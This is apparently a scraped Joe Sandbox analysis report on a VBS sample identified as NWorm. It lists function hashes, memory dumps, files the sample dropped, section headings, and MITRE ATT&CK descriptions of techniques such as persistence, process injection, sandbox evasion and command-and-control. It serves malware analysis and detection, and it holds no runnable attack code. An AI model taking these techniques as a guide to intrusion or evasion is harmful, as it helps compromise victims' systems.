Snapshot File: hcaresult_10_2_7ff9ece80000_powershell.jbxd

Similarity

API ID:
String ID: `9$`9$9$`_I$`_^
API String ID: 0-2323841811
Opcode ID: 655afade25e7ba27151da44c40bc8a34793da608d1fa61fb9a9bb0e497755197
Instruction ID: d3092e84383e6c1889cafb8a8171ee58ad85924da7cdc63e258783a067a7f83a
Opcode Fuzzy Hash: 655afade25e7ba27151da44c40bc8a34793da608d1fa61fb9a9bb0e497755197
Instruction Fuzzy Hash: 3A413657D4F6C22BF2539B2828953657F50BF5276071C41FFC0D8AA197AC9CAD098363

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9ECE859A2 Relevance: 6.4, Strings: 5, Instructions: 105COMMON

Download Yara Rule

Strings

`9, xrefs: 00007FF9ECE85A19
`_I, xrefs: 00007FF9ECE859F4
`_^, xrefs: 00007FF9ECE859B1
9, xrefs: 00007FF9ECE85A59
`9, xrefs: 00007FF9ECE859F9

Memory Dump Source

Source File: 0000000A.00000002.951270502.00007FF9ECE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff9ece80000_powershell.jbxd

Similarity

API ID:
String ID: `9$`9$9$`_I$`_^
API String ID: 0-2323841811
Opcode ID: 4b0dc382bd6e421925b24478f53c20388cdc6174a084803f2cfe202a81c0ea10
Instruction ID: 3d4308c5f9381de7fee73f92810aca5ea25107dd22acc62d81afd15fa64246e8
Opcode Fuzzy Hash: 4b0dc382bd6e421925b24478f53c20388cdc6174a084803f2cfe202a81c0ea10
Instruction Fuzzy Hash: A7314157D4F6C22FF3439B2828953647F90AF5266071C40FFC0D8AA197AC9CAD098363

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: aspnet_compiler.exePID: 6880, Parent PID: 6592COMMON

Execution Graph

Execution Coverage:	15.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 014847C4 Relevance: 1.6, APIs: 1, Instructions: 100
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?), ref: 014848B7

Memory Dump Source

Source File: 0000000B.00000002.942874235.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1480000_aspnet_compiler.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7aba8f98e0f1fe826b6284fab6d467d7bfc72258455696224a05e3a19ee97cce
Instruction ID: 6afdcf59abf1943c2e61b6580e0c675df144f93719f40a796281875cc8f34e29
Opcode Fuzzy Hash: 7aba8f98e0f1fe826b6284fab6d467d7bfc72258455696224a05e3a19ee97cce
Instruction Fuzzy Hash: 6E416674D102499FDB10DFA9D98579EBBF1FB48318F18802AE814AB790D7749446CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0148288C Relevance: 1.6, APIs: 1, Instructions: 97
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?), ref: 014848B7

Memory Dump Source

Source File: 0000000B.00000002.942874235.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1480000_aspnet_compiler.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4e6ebd735226a52af06d9727cbc27951a1b24af74cdf5e124afa28fa4fa9f0a3
Instruction ID: 38e0f1e3b41ff1c90fbc8eae94f3a1da616a47a29eb913c7740cc692664eba92
Opcode Fuzzy Hash: 4e6ebd735226a52af06d9727cbc27951a1b24af74cdf5e124afa28fa4fa9f0a3
Instruction Fuzzy Hash: 10416770D103499FDB10EFA9D98479EBBF1FB48318F18802AE815AB790D7749845CF91

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report YBAXAKQXVYWIXQJDE.VBS

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: NWorm

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\ICPDRCYNSQCDVKBIWIFZCD\ICPDRCYNSQCDVKBIWIFZCD.bat

C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eyjkuotk.us3.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jkiixbce.yg4.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wdw3uacw.m2o.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wzpb2otl.kpp.psm1

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
YBAXAKQXVYWIXQJDE.VBS

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre